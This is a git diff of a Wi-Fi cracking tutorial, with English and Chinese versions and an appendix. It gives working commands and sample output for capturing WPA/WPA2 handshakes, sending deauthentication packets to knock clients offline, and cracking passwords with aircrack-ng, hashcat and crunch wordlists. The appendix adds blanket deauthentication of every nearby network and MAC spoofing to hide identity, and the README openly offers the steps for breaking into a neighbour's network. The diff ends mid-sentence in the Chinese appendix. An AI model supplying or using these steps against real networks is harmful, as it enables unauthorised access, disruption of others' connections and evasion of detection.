diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..0435a76 --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,20 @@ +# Changelog + +## 1.3 + +- Add Chinese versions as README.zh.md and appendix.zh.md thanks to [neal1991](https://github.com/neal1991). + +## 1.2 + +- Add MacOS/OSX support via the [appendix](appendix.md), thanks [harshpatel991](https://github.com/harshpatel991)! + +## 1.1 + +- Add [appendix](appendix.md) + - Handshake capture with `wlandump-ng` + - Programatic wordlist generation with `crunch` + - Macchanger info + +## 1.0 + +- Original tutorial with rolling changes for small updates and typos, etc... diff --git a/README.md b/README.md index dbdba52..7fa5df3 100644 --- a/README.md +++ b/README.md 
@@ -4,7 +4,7 @@ Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and [Aircrack-ng](http://aircrack- This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the [end of this document](#deauth-attack). -If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at [the bottom](#list-of-commands). +If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at [the bottom](#list-of-commands). For a variety of suggestions and alternative methods, see the [appendix](appendix.md). [neal1991](https://github.com/neal1991) has also graciously provided translations to [this document](README.zh.md) and the [appendix](appendix.zh.md) in Chinese if you prefer those versions. __DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.__ 
@@ -13,10 +13,10 @@ __DISCLAIMER: This software/tutorial is for educational purposes only. It should This tutorial assumes that you: - Have a general comfortability using the command-line -- Are running a debian-based linux distro (preferably [Kali linux](https://www.kali.org/)) +- Are running a debian-based linux distro, preferably [Kali linux](https://www.kali.org/) (OSX users see the [appendix](appendix.md)) - Have [Aircrack-ng](http://aircrack-ng.org/) installed - `sudo apt-get install aircrack-ng` -- Have a wireless card that supports [monitor mode](https://en.wikipedia.org/wiki/Monitor_mode) (I recommend [this one](https://www.amazon.com/s/?ie=UTF8&keywords=tl+wn722n). See [here](http://aircrack-ng.org/doku.php?id=compatible_cards) for more info.) +- Have a wireless card that supports [monitor mode](https://en.wikipedia.org/wiki/Monitor_mode) (see [here](http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html) for a list of supported devices) ## Cracking a Wi-Fi Network @@ -195,7 +195,7 @@ Now, leave `airodump-ng` running and open a new terminal. We will use the `airep ```bash # -0 2 specifies we would like to send 2 deauth packets. Increase this number -# if need be with the risk of noticably interrupting client network activity +# if need be with the risk of noticeably interrupting client network activity # -a is the MAC of the access point # -c is the MAC of the client aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 
@@ -244,8 +244,19 @@ cap2hccapx.bin capture/-01.cap capture/-01.hccapx HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh ``` +## Appendix + +The response to this tutorial was so great that I've added suggestions and additional material from community members as an [appendix](appendix.md). Check it out to learn how to: + +- Capture handshakes and crack WPA passwords on MacOS/OSX +- Capture handshakes from every network around you with `wlandump-ng` +- Use `crunch` to generate 100+GB wordlists on-the-fly +- Spoof your MAC address with `macchanger` + +A [Chinese version](appendix.zh.md) of the appendix is also available. + ## Attribution Much of the information presented here was gleaned from [Lewis Encarnacion's awesome tutorial](https://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html). Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat. -Shout out to [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore), [hivie7510](https://www.reddit.com/user/hivie7510), [cprogrammer1994](https://github.com/cprogrammer1994), [hartzell](https://github.com/hartzell), [flennic](https://github.com/flennic), [bhusang](https://github.com/bhusang), [tversteeg](https://github.com/tversteeg), [gpetrousov](https://github.com/gpetrousov), [crowchirp](https://github.com/crowchirp) and [Shark0der](https://github.com/shark0der) who also provided suggestions and typo fixes on [Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/) and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on [this](https://news.ycombinator.com/item?id=14840539) Hacker News post. +Overwhelming thanks to [neal1991](https://github.com/neal1991) for translating this tutorial into [Chinese](README.zh.md). 
Further shout outs to [hiteshnayak305](https://github.com/hiteshnayak305), [enilfodne](https://github.com/enilfodne), [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore), [hivie7510](https://www.reddit.com/user/hivie7510), [cprogrammer1994](https://github.com/cprogrammer1994), [0XE4](https://github.com/0XE4), [hartzell](https://github.com/hartzell), [zeeshanu](https://github.com/zeeshanu), [flennic](https://github.com/flennic), [bhusang](https://github.com/bhusang), [tversteeg](https://github.com/tversteeg), [gpetrousov](https://github.com/gpetrousov), [crowchirp](https://github.com/crowchirp) and [Shark0der](https://github.com/shark0der) who also provided suggestions and typo fixes on [Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/) and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on [this](https://news.ycombinator.com/item?id=14840539) Hacker News post. diff --git a/README.zh.md b/README.zh.md new file mode 100644 index 0000000..1da76ad --- /dev/null +++ b/README.zh.md 
@@ -0,0 +1,263 @@ +# Wi-Fi破解 + +利用Airodump-ng以及[Aircrack-ng](http://aircrack-ng.org/)/[Hashcat](http://hashcat.net/)破解WPA/WPA2 WI-FI路由器。 + +这是一个简要的按照步骤的教程,描述了如何破解使用弱密码保护的WI-FI网络。它不会极其详尽,但是对于你测试你自己的网络安全或者入侵附近网络已经包含足够的信息。下面列出的攻击完全是被动的(仅仅监听,不会广播你电脑上的任何东西),并且对于你破解的但是却未真正使用的密码是无法监测到的。一个可选的破解认证的攻击可以用于加速侦查过程并且在[文档末尾](#deauth-attack)有描述。 + + +如果你熟悉这个过程,你可以跳过这段描述直接跳到[底部](#命令列表)使用的命令列表。至于多种建议以及可行的方法,参考[附录](appendix.zh.md)。[neal1991](https://github.com/neal1991)也将[这份文档](README.zh.md)以及[附录](appendix.zh.md)翻译成中文,可以选择你偏好的版本。 + +__声明:这个软件/教程仅仅用于教学。不应该使用它从事任何非法活动。作者不会对它的使用负责。不要犯傻。__ + +## 入门 + +这个教程认为你: + +- 可以流畅使用命令行 +- 使用一个基于debian的linux发行版本,最好是[Kali linux](https://www.kali.org/)(OSX用户参考[附录](appendix.zh.md)) +- 安装[Aircrack-ng](http://aircrack-ng.org/) + - `sudo apt-get install aircrack-ng` +- 无线网卡能够支持[监视模式](https://en.wikipedia.org/wiki/Monitor_mode)(对于支持的设备列表,参考[这](http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html)) + +## 破解一个WI-FI网络 + +### 监视模式 + +开始通过下面的命令可以列出支持监视模式的无线接口: + +```bash +airmon-ng +``` + +如果你看到没有列出一个接口,那么你的无线网卡就不支持监视模式 😞 + +我们将假设你的无线接口名称是`wlan0`,但是请确保使用正确的名称如果你的名称与这个不同的话。接下来,我们将接口转换为监视模式: + +```bash +airmon-ng start wlan0 +``` + +运行`iwconfig`。你现在应该能够看到列出一个新的监视模式接口(像`mon0`或者`wlan0mon`)。 + +### 找到你的目标 + +使用你的监视接口开始监听附近的[802.11 Beacon 帧](https://en.wikipedia.org/wiki/Beacon_frame)广播: + +```bash +airodump-ng mon0 +``` + +你应该可以看到类似于下面的输出。 + +``` +CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49 + + BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID + + 14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests + 14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 + 14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP + 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro + 9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme + 00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome + 06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2 + 78:71:9C:99:67:D0 -82 339 0 0 1 54e. 
WPA2 CCMP PSK ARRIS-67D2 + 9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT + BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root + EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca +``` + +出于这个演示的目的,我们将会破解我自己的网络,"hackme"。记住利用`airodump-ng`展示的BSSID MAC地址以及信道(`CH`)号,因为在下一个步骤中我们将会需要它们。 + +### 捕获4路握手 + +WPA/WPA2使用[4路握手](https://security.stackexchange.com/questions/17767/four-way-handshake-in-wpa-personal-wpa-psk)来认证设备连接网络。你不想要明白这些的含意,但是你必须捕获这些握手从而能够破解网络密码。这些握手发生在设备连接网络的时候,比如,当你的邻居工作回家的时候。我们通过之前命令发现的信道以及bssid值来使用`airmon-ng`来监视目标网络。 + +```bash +# 将-c 以及--bssid值替换为你的目标网络值 +# -w 制订了我们保存捕获数据包保存的文件夹 +airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0 +``` +``` + CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ] + + BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID + + 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS +``` + +现在我们等待... 一旦我们捕捉到一个握手,你应该能够马上在屏幕的右上角看到类似于`[ WPA handshake: bc:d3:c9:ef:d2:67`的一些东西。 + +如果你已经感觉不耐烦了,并且希望实施一次攻击,你可以强制设备连接到目标网站来重新连接,并且在目标网络中发送恶意的解除验证数据包。这经常就能够捕获4路握手。参考下面的[deauth攻击章节](#deauth-attack)来获取关于此的信息。 + +一旦你捕获了一个握手,按下`ctrl-c`来终止`airodump-ng`。你应该可以看到一个你告诉`airodump-ng`用来保存捕获信息的`.cap`文件(比如叫做`-01.cap`)。我们将会使用这个捕获文件来破解网络密码。我喜欢对这个文件重命名从而反映我们现在尝试破解的网络名称: + +```bash +mv ./-01.cap hackme.cap +``` + +### 破解网络密码 + +最后一个步骤是使用捕获的握手来破解密码。如果你能够访问GPU,我**强烈**建议你使用`hashcat`来破解密码。我已经创建了一个叫做[`naive-hashcat`](https://github.com/brannondorsey/naive-hashcat)的简单工具可以让使用hashcat变得非常方便。如果你不能够访问GPU,还有很多在线的GPU破解服务可以使用,比如[GPUHASH.me](https://gpuhash.me/)或者[OnlineHashCrack](https://www.onlinehashcrack.com/wifi-wpa-rsna-psk-crack.php)。你也可以常使用Aircrack-ng来进行CPU破解。 + +注意下面的攻击方法都假设用户使用弱的密码。大多数WPA/WPA2路由自带12位强随机密码,大多数用户都不会去更改。如果你去尝试破解这些密码,我建议你使用[Probable-Wordlists WPA-length](https://github.com/berzerk0/Probable-Wordlists/tree/master/Real-Passwords/WPA-Length) 字典文件。 + +#### 使用`naive-hashcat`破解(推荐) + +在我们使用naive-hashcat破解密码之前,我们需要将我们的`.cap`文件转换成同等hashcat文件格式`.hccapx`。你可以通过上传`.cap`文件到 
或者直接使用[`cap2hccapx`](https://github.com/hashcat/hashcat-utils)工具。 + +```bash +cap2hccapx.bin hackme.cap hackme.hccapx +``` + +接着,下载并且运行`naive-hashcat`: + +```bash +# 下载 +git clone https://github.com/brannondorsey/naive-hashcat +cd naive-hashcat + +# 下载134MBrockyou字典文件 +curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt + +# 破解!宝贝!破解! +# 2500是hashcat对于WPA/WPA2的哈希模式 +HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh +``` + +Naive-hashcat使用多种[字典](https://hashcat.net/wiki/doku.php?id=dictionary_attack),[规则](https://hashcat.net/wiki/doku.php?id=rule_based_attack),[组合](https://hashcat.net/wiki/doku.php?id=combinator_attack)以及[伪装](https://hashcat.net/wiki/doku.php?id=mask_attack)(聪明的暴力)攻击,并且它需要花费数天甚至数月来破解中等长度的密码。破解的密码将会保存到hackme.pot,因此阶段性地检查这个文件。一旦你破解这个密码,你将会在你的`POI_FILE`看到类似于下面的内容: + +``` +e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet +``` + +最后两块被`:`分隔开来,分别是网络名称和密码。 + +如果你希望不需要`naive-hashcat`来使用`hashcat`的话请参考[这个页面](https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2)。 + +#### 利用Aircrack-ng破解 + +Aircrack-ng可以用于在你的CPU上运行来进行非常基本的字典攻击。在你运行攻击之前,你需要一个单词表。我推荐使用非常著名的rockyou字典文件: + +```bash +# 下载134MBrockyou字典文件 +curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt +``` + +注意,如果网络密码不再这个单词文件话,你将不能破解密码。 + +```bash +# -a2指定WPA2,-b是BSSID,-w是单词文件 +aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap +``` + +如果密码被破解了,你将会在终端看到一个`KEY FOUND!`消息,在其后将会看到网络密码的纯文本。 + +``` + Aircrack-ng 1.2 beta3 + + + [00:01:49] 111040 keys tested (1017.96 k/s) + + + KEY FOUND! 
[ hacktheplanet ] + + + Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 + 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E + + Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 + 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 + 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 + 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 + + EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4 +``` + +## 解除认证攻击 + +解除认证攻击会将伪造的身份验证数据包从您的计算机发送到连接到您尝试破解的网络的客户端。 这些数据包包括伪造的“发件人”地址,使得它们像客户端那样从接入点本身发送出去。 收到这样的数据包后,大多数客户端断开与网络的连接,并立即重新连接,如果您正在使用`airodump-ng`进行侦听,则提供4路握手。 + +使用`airodump-ng`监视特定接入点(使用`-c channel --bssid MAC`),直到看到客户端(`STATION`)连接。 连接的客户端看起来像这样,`64:BC:0C:48:97:F7`是客户端MAC。 + +``` + CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ] + + BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID + + 9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS + + BSSID STATION PWR Rate Lost Frames Probe + + 9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS +``` + +现在,让`airodump-ng`运行并打开一个新的终端。 我们将使用`aireplay-ng`命令向我们的受害者客户端发送假的接触认证数据包,强制其重新连接到网络,并希望在此过程中抓取握手。 + +```bash +# -0 2 指定了我们应该发送2个解除认证的数据包。如果需要考虑到被周围网络活动大段的风险, +# 可以增加这个数字 +# -a 是接入点的MAC +# -c 是客户端的MAC +aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 +``` + +你可以选择得通过广播解除认证数据包到所有连接的客户端: + +```bash +# 尽管不是所有的客户端都支持广播解除认证 +aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0 +``` + +一旦你发送了解除认证数据包,回到你的`airodump-ng`进程,运气好的话你现在应该看到右上角:`[WPA握手:9C:5C:8E:C9:AB:C0`。 现在你已经捕获了握手,你应该准备好[破解网络密码](#crack-the-network-password)。 + +## 命令列表 + +下面列出了破解WPA/WPA2网络所需的所有命令,以最少的解释为依据。 + +```bash +# 将你的设备设置成监视模式 +airmon-ng start wlan0 + +# 监听附近所有的beacon帧来获取目标BSSID以及信道 +airodump-ng mon0 + +# 开始监听握手 +airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0 + +# 选择性的对于连接的设备进行解除验证从而强制握手 +aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 + +########## 利用aircrack-ng破解密码... 
########## + +# 如果需要的话下载134MB的rockyou.txt字典文件 +curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt + +# 利用w/ aircrack-ng破解 +aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap + +########## 或者利用naive-hashcat破解密码 ########## + +# 将cap转换成hccapx +cap2hccapx.bin capture/-01.cap capture/-01.hccapx + +# 利用naive-hashcat破解 +HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh +``` + +## 附录 + +对本教程的回应是非常好的,我已经添加了社区成员的建议和附加资料作为[附录](#appendix.zh.md)。看看如何: + +- 在MacOS/OSX上捕获握手并且破解WPA密码 +- 利用`wlandump-ng`捕获从你周围每个网络捕获握手 +- 使用`crunch`即时生成100多GB的单词列表 +-  利用`macchanger`伪造你的MAC地址 + +现在也提供[中文版本](appendix.zh.md)附录。 + +## 致谢 + +这里提供的大部分信息都是从[Lewis Encarnacion的绝妙的教程](https://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html)收集的。 感谢在Aircrack-ng和Hashcat上工作的优秀作者和维护者。 + +非常感谢[neal1991](https://github.com/neal1991)将本教程翻译成[中文](README.zh.md)。另外也感谢[hiteshnayak305](https://github.com/hiteshnayak305),[enilfodne](https://github.com/enilfodne), [DrinkMoreCodeMore](https://www.reddit.com/user/DrinkMoreCodeMore),[hivie7510](https://www.reddit.com/user/hivie7510),[cprogrammer1994](https://github.com/cprogrammer1994),[0XE4](https://github.com/0XE4),[hartzell](https://github.com/hartzell),[zeeshanu](https://github.com/zeeshanu),[flennic](https://github.com/flennic),[bhusang](https://github.com/bhusang),[tversteeg](https://github.com/tversteeg),[gpetrousov](https://github.com/gpetrousov),[crowchirp](https://github.com/crowchirp)和[Shark0der](https://github.com/shark0der),他们还在[Reddit](https://www.reddit.com/r/hacking/comments/6p50is/crack_wpawpa2_wifi_routers_with_aircrackng_and/)和GitHub。如果您有兴趣听取WPA2的一些建议替代方案,请在[这](https://news.ycombinator.com/item?id=14840539)参考Hacker News的一些重要讨论。 diff --git a/appendix.md b/appendix.md new file mode 100644 index 0000000..6e7c2d8 --- /dev/null +++ b/appendix.md 
@@ -0,0 +1,168 @@ +# Appendix + +After the initial release of this tutorial, several people from various corners of the internet reached out with comments and suggestions. In an effort two keep the original tutorial short and sweet, I've included information about their wonderful suggestions here, and added some of my own. Here you will find info on: + +- Wi-Fi cracking on MacOS/OSX +- Capturing handshakes with `landump-ng` +- Generating wordlists with `crunch` +- Protecting your identity with `macchanger` + +## Wi-Fi cracking on MacOS/OSX + +Huge thanks to [@harshpatel991](https://github.com/harshpatel991) for contributing this guide. The following explains how to use built-in MacOS/OSX tools to capture a 4-way handshake and naive-hashcat to determine the password of a WPA/WPA2 wireless network. This method has been tested on OSX versions 10.10 and 10.12 but will likely work with other versions as well. Like the main tutorial, it assumes you have a [wireless card](http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html) that supports [monitor mode](https://en.wikipedia.org/wiki/Monitor_mode). We've tested this on both Early-2012 and Mid-2015 Macbook Pros with great success. + +### Wireless Diagnostics tools + +Luckily, OSX comes with a suite of wireless diagnostic tools. To open them, hold down the option key on your keyboard and click on the Wi-Fi icon in the menu bar. Then click "Open Wireless Diagnostics..." + +### Determine the channel of your target network + +With Wireless Diagnostics open, click on Window > Scan. Find the target network, note its channel and width. + +### Capture a 4-way Handshake + +1. With Wireless Diagnostics open, click on Window > Sniffer. Select the channel and width that you found in the previous step. +2. Now you'll need to wait for a device to connect to the target network. If you are testing this on your network (which you should be), reconnect a wireless device to capture a handshake. +3. 
Once you think you've got a handshake, click Stop. +4. The `.wcap` capture file will either be saved to your Desktop or `/var/tmp/` depending on your operating system version. +5. Convert the capture file to `.hccapx` by uploading it to https://hashcat.net/cap2hccapx/. If you captured any handshakes, the site will start downloading a `.hccapx` file. No download will be prompted if you did not. + +### Crack the password with `naive-hashcat` + +```bash +# clone naive-hashcat +git clone https://github.com/brannondorsey/naive-hashcat +cd naive-hashcat + +# build from source on MacOS/OSX +./build-hashcat-osx.sh + +# download the 134MB rockyou dictionary file +curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt +``` + +Finally, run `naive-hashcat.sh`. Change `handshake.hccapx` to the name of the file you downloaded from [hashcat.net](https://hashcat.net/cap2hccapx/). `cracked.pot` is the name of the output file. + +``` +HASH_FILE=handshake.hccapx POT_FILE=cracked.pot HASH_TYPE=2500 ./naive-hashcat.sh +``` + +Thanks again to [@harshpatel991](https://github.com/harshpatel991), as well as [phillips321](http://www.phillips321.co.uk/) for his [post](https://www.phillips321.co.uk/2016/07/09/hashcat-on-os-x-getting-it-going/) about building hashcat for OSX. + +## Capturing handshakes with `wlandump-ng` + +[@enilfodne](https://github.com/enilfodne) has [informed me](https://github.com/brannondorsey/wifi-cracking/issues/15) that the hashcat community has a prefered tool for capturing WPA 4-way handshakes, called `wlandump-ng`. This tool belongs to a suite of hashcat related utilities called [hcxtools](https://github.com/ZerBea/hcxtools) developed by [ZerBea](https://github.com/ZerBea), and has notable perks over `airdump-ng`. `wlandump-ng` allows you to blanket capture handshakes from every nearby network at once, hopping Wi-Fi channels in order to increase collection. 
+ + +```bash +# clone hcxtools +git clone https://github.com/ZerBea/hcxtools +cd hcxtools + +# build and install +# you will likely need to apt install the required dependencies: +# https://github.com/ZerBea/hcxtools#requirements +make +sudo make install + +# blanket death connected clients from all nearby access points and listen for re-connections +# replace wlan0 with your wireless device name +wlandump-ng -i wlan0 -o capture.cap -c 1 -t 60 -d 100 -D 10 -m 512 -b -r -s 20 + +# once you've got a capture file, you can convert it to the hashcat capture format with +cap2hccapx.bin capture.cap capture.hccapx +``` + +`wlandump-ng` command-line args (use `-h` flag for full list): + +- `-c 1`: start in the 2.4Ghz range from channel 1 (will go to 13) +- `-t 60`: stay on each channel for 60s (experiment with lower values, default is `5`) +- `-d 100`: send deauth every 100 beacon frames +- `-D 10`: send disassosciation packets every 10 beacons frames +- `-m 512`: internal ringbuffer size, use 512 for low resource machines +- `-b`: activate beaconing to last 10 probe requests +- `-r`: reset deauthentication/disassosciation counter if hop loop is on channel 1 +- `-s 20`: display 20 status lines + +**WARNING:** Using this is likely illegal in most places. See [here](https://github.com/ZerBea/hcxtools#warning) for more info. + +`wlandump-ng` also offers the option to run in passive mode without transmitting any deauth/disassociation frames. This is recommended if you are are sensitive to disrupting the network activity of those around you (which you should be). The trade-off is that you will capture far fewer handshakes, but this method makes the capture undetectable. + +```bash +# run with default settings in passive mode +wlandump-ng -i wlan0 -o capture.cap -p -s 20 +``` + +## Generating wordlists with `crunch` + +`crunch`is a tool to generate wordlists using combinations of a given string or pattern. 
We can use crunch to generate a password list on-the-fly and pipe it to `aircrack-ng` without having the wordlist saved to disk. + +```bash +# install crunch +sudo apt-get install crunch +``` + +To get an idea of how crunch works, run it from the command-line (be ready to press `ctrl-c` once it starts spewing passwords): + +```bash +# syntax 8 8 are min-length and max-length of password to generate +# 01234567890 is the set of characters to combine/permute to construct the passwords +crunch 8 8 0123456789 +``` + +``` +Crunch will now generate the following amount of data: 900000000 bytes +858 MB +0 GB +0 TB +0 PB +Crunch will now generate the following number of lines: 100000000 +00000000 +00000001 +00000002 +00000003 +00000004 +00000005 +00000006 +00000007 +00000008 +00000009 +... +99999999 +``` + +We can pipe the output of `crunch` as the input to `aircrack-ng`, using the passwords that it generates as our wordlist. Here we use the `crunch` special rule character `%` to denote a digit. This command attempts to crack WPA passwords that are 10-digit phone numbers (using 102GB of numbers generated by crunch on-the-fly): + +```bash +# we can also use -t "@^%," to use pattern '@' - replaced with lowercase ',' - replaced with uppercase +# '%' - replaced with numbers and '^' - is replaced with special chars +# *************** don't forget '-' at the end +crunch 10 10 -t "%%%%%%%%%%" | aircrack-ng -a2 capture.cap -b 58:98:35:CB:A2:77 -w - +``` + +Thanks to [@hiteshnayak305](https://github.com/hiteshnayak305) for the introduction to `crunch` and including this update as a [PR](https://github.com/brannondorsey/wifi-cracking/pull/17). + +## Protecting your identify with `macchanger` + +Whenever you are doing anything remotely nefarious with Wi-Fi, it is a good idea to spoof your the MAC address of your Wi-Fi device so that any network traffic that gets recorded can't be tied to serial assigned by your device manufacturer. 
+ +This is trivial with `macchanger`: + +```bash +# download MAC changer +sudo apt-get install macchanger + +# bring the device down +sudo ifconfig wlan0 down + +# change the mac +# -A pics a random MAC w/ a valid vendor +# -r makes it truly random +# -p restores it to the original hardware MAC +sudo macchanger -A wlan0 + +# bring the device back up +sudo ifconfig wlan0 up +``` + +If you've got multiple cards, it might also be a good idea to do this to all of them. Or better yet, bring unused wireless interfaces down whenever you are attempting to capture handshakes, to leave as little trace as possible. Note that spoofing changes do not persist across reboots. diff --git a/appendix.zh.md b/appendix.zh.md new file mode 100644 index 0000000..a4bcc72 --- /dev/null +++ b/appendix.zh.md 
@@ -0,0 +1,168 @@ +# 附录 +在本教程初次发布之后,来自互联网各个角落的一些人提出了意见和建议。 在努力保持原始教程简短而优美的基础上,我在这里介绍了有关他们精彩建议的信息,并添加了我自己的一些。 在这里,你可以找到以下信息: + +- 在MacOS/OSX上破解WI-FI +- 利用`landump-ng`捕获握手 +- 利用`crunch`生成单词列表 +- 利用`macchanger`保护你的身份 + +## 在MacOS/OSX上破解WI-FI + +非常感谢[@harshpatel991](https://github.com/harshpatel991)提供本指南。以下说明如何使用内置的MacOS/OSX工具捕获4路握手和naive-hashcat来确定WPA/WPA2无线网络的密码。 此方法已在OSX 10.10和10.12版上进行了测试,但也可能与其他版本一起使用。 像主教程一样,它假设你有一个[无线网卡](http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html)支持[监视模式](https://en.wikipedia.org/wiki/Monitor_mode)。我们已经在2012年上半年和2015年中期MacBook Pro上取得了巨大的成功。 + +### 无线诊断工具 + +幸运的是,OSX配备了一套无线诊断工具。 要打开它们,请按住键盘上的选项键,然后单击菜单栏中的Wi-Fi图标。 然后点击“打开无线诊断...” + +### 决定目标网络信道 + +打开无线诊断程序,单击窗口>扫描。 找到目标网络,注意其信道和宽度。 + +### 捕获一个4路握手 + +1. 打开无限诊断,点击窗口>嗅探器。选择你在上一步中找到的信道和宽度。 +2. 现在,你需要等待设备连接到目标网络。如果你正在网络上测试(你应该),请重新连接无线设备以捕获握手。 +3. 一旦你认为已经捕获手握手,请点击停止。 +4. 根据你的操作系统版本,`.wcap`捕获文件将被保存到桌面或`/var/tmp/`。 +5.将捕获文件转换为`.hccapx`,将其上传到https://hashcat.net/cap2hccapx/。 如果你捕获到任何握手,站点将开始下载一个`.hccapx`文件。 如果没有,将不会提示下载。 + +### 利用`naive-hashcat`破解密码 + +```bash +# 克隆naive-hashcat +git clone https://github.com/brannondorsey/naive-hashcat +cd naive-hashcat + +# 在MacOS/OSX上构建源代码 +./build-hashcat-osx.sh + +# 下载134MB rockyou字典文件 +curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt +``` + +最后,运行`naive-hashcat.sh`。将`handshake.hccapx`的名称改成你从[hashcat.net](https://hashcat.net/cap2hccapx/)下载的文件名称。`cracked.pot`是输出文件名称。 + +``` +HASH_FILE=handshake.hccapx POT_FILE=cracked.pot HASH_TYPE=2500 ./naive-hashcat.sh +``` + +再次感谢[@harshpatel991](https://github.com/harshpatel991),以及感谢[phillips321](http://www.phillips321.co.uk/)他的在OSX上构建hashcat的[帖子](https://www.phillips321.co.uk/2016/07/09/hashcat-on-os-x-getting-it-going/)。 + +## 利用`wlandump-ng`来捕获握手 + +[@enilfodne](https://github.com/enilfodne)已经[告诉我](https://github.com/brannondorsey/wifi-cracking/issues/15)hashcat社区对于捕获WPA 
